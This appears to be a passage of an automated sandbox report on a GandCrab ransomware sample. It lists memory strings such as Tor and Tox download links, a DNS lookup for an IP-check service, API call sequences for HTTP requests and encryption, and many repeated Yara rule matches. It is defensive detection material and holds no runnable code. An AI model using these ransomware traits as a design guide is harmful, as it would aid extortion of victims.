Source: ssapst.exe, 00000002.00000002.369878312.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/G%b
Source: ssapst.exe, 00000004.00000002.382761696.0000000001018000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/I
Source: ssapst.exe, 00000002.00000002.369878312.0000000000DCA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/I;
Source: ssapst.exe, 00000004.00000002.382761696.0000000001018000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/QL
Source: ssapst.exe, 00000004.00000002.382761696.0000000001018000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/S
Source: ssapst.exe, 00000019.00000002.607798154.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, ssapst.exe, 00000019.00000003.601906375.0000000000F31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/g
Source: ssapst.exe, 00000018.00000002.585108554.00000000012E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/x
Source: wThN5MTIsw.exe, 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmp, ssapst.exe, 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000006.00000002.406483395.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000008.00000002.421052694.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000C.00000002.445300926.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000E.00000002.457737689.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000F.00000002.485790617.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000012.00000002.521001527.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000013.00000002.556559672.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000018.00000002.585820146.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000019.00000002.608758289.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001A.00000002.628251824.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001E.00000002.654951583.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000020.00000002.682007928.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000021.00000002.703365325.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000022.00000002.734737605.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: https://tox.chat/download.html
Source: wThN5MTIsw.exe, 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmp, ssapst.exe, 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000006.00000002.406483395.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000008.00000002.421052694.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000C.00000002.445300926.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000E.00000002.457737689.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000000F.00000002.485790617.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000012.00000002.521001527.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000013.00000002.556559672.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000018.00000002.585820146.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000019.00000002.608758289.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001A.00000002.628251824.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 0000001E.00000002.654951583.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000020.00000002.682007928.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000021.00000002.703365325.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, ssapst.exe, 00000022.00000002.734737605.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	String found in binary or memory: https://www.torproject.org/

Source: unknown

DNS traffic detected: queries for: ipv4bot.whatismyipaddress.com

Source: C:\Users\user\Desktop\wThN5MTIsw.exe

Code function: 0_2_0F4E8050 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree,

0_2_0F4E8050

Source: wThN5MTIsw.exe, 00000000.00000002.335360112.00000000008BA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Yara detected Gandcrab

Source: Yara match	File source: 18.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001E.00000002.654951583.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.445300926.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.585820146.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.421052694.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.608758289.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.703365325.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.406483395.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.556559672.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.628251824.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.734737605.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.485790617.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.457737689.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.383047915.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.682007928.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.521001527.000000000FE72000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wThN5MTIsw.exe PID: 6388, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 6592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 6840, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 7028, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 5668, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 6104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 1416, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 3248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 6228, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 7020, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 7108, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 204, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 4804, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 1784, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 5076, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ssapst.exe PID: 5700, type: MEMORYSTR

Source: C:\Users\user\Desktop\wThN5MTIsw.exe	Code function: 0_2_0F4E6660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	0_2_0F4E6660
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 2_2_0FE66660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	2_2_0FE66660
Source: C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Code function: 4_2_0FE66660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	4_2_0FE66660

System Summary

Malicious sample detected (through community Yara rule)

Source: wThN5MTIsw.exe, type: SAMPLE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: wThN5MTIsw.exe, type: SAMPLE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: wThN5MTIsw.exe, type: SAMPLE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 34.3.ssapst.exe.32a0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 34.3.ssapst.exe.32a0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 34.3.ssapst.exe.32a0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 32.3.ssapst.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 32.3.ssapst.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 32.3.ssapst.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 18.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 18.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 18.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.3.wThN5MTIsw.exe.3170000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.3.wThN5MTIsw.exe.3170000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.3.wThN5MTIsw.exe.3170000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 35.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 35.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 35.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.wThN5MTIsw.exe.f4e0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 19.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 19.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 19.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 19.3.ssapst.exe.3520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 19.3.ssapst.exe.3520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 19.3.ssapst.exe.3520000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 30.3.ssapst.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 30.3.ssapst.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 30.3.ssapst.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 8.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 8.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 8.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.3.ssapst.exe.36d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.3.ssapst.exe.36d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.3.ssapst.exe.36d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 6.3.ssapst.exe.2f70000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 6.3.ssapst.exe.2f70000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 6.3.ssapst.exe.2f70000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 15.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 15.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 15.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.3.ssapst.exe.36d0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.3.ssapst.exe.36d0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.3.ssapst.exe.36d0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 32.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 32.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 32.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.3.wThN5MTIsw.exe.3170000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.3.wThN5MTIsw.exe.3170000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.3.wThN5MTIsw.exe.3170000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 24.3.ssapst.exe.3b60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 24.3.ssapst.exe.3b60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 24.3.ssapst.exe.3b60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 26.3.ssapst.exe.3830000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 26.3.ssapst.exe.3830000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 26.3.ssapst.exe.3830000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 24.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 24.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 24.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 30.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 30.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 30.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 34.3.ssapst.exe.32a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 34.3.ssapst.exe.32a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 34.3.ssapst.exe.32a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 35.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 35.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 35.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 18.3.ssapst.exe.3230000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 18.3.ssapst.exe.3230000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 18.3.ssapst.exe.3230000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 15.3.ssapst.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 15.3.ssapst.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 15.3.ssapst.exe.3300000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 6.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 6.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 6.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 12.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 12.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 12.3.ssapst.exe.3730000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 24.3.ssapst.exe.3b60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 24.3.ssapst.exe.3b60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 24.3.ssapst.exe.3b60000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 18.3.ssapst.exe.3230000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 18.3.ssapst.exe.3230000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 18.3.ssapst.exe.3230000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 15.3.ssapst.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 15.3.ssapst.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 15.3.ssapst.exe.3300000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 17.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 17.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 17.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 8.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 8.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 8.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 22.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 22.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 22.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 14.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 14.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 14.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 24.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 24.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 24.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 19.3.ssapst.exe.3520000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 19.3.ssapst.exe.3520000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 19.3.ssapst.exe.3520000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 19.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 19.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 19.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 17.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 17.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 17.2.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 4.3.ssapst.exe.38c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 4.3.ssapst.exe.38c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 4.3.ssapst.exe.38c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 30.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 30.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 30.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 22.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 22.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 22.0.ssapst.exe.fe60000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
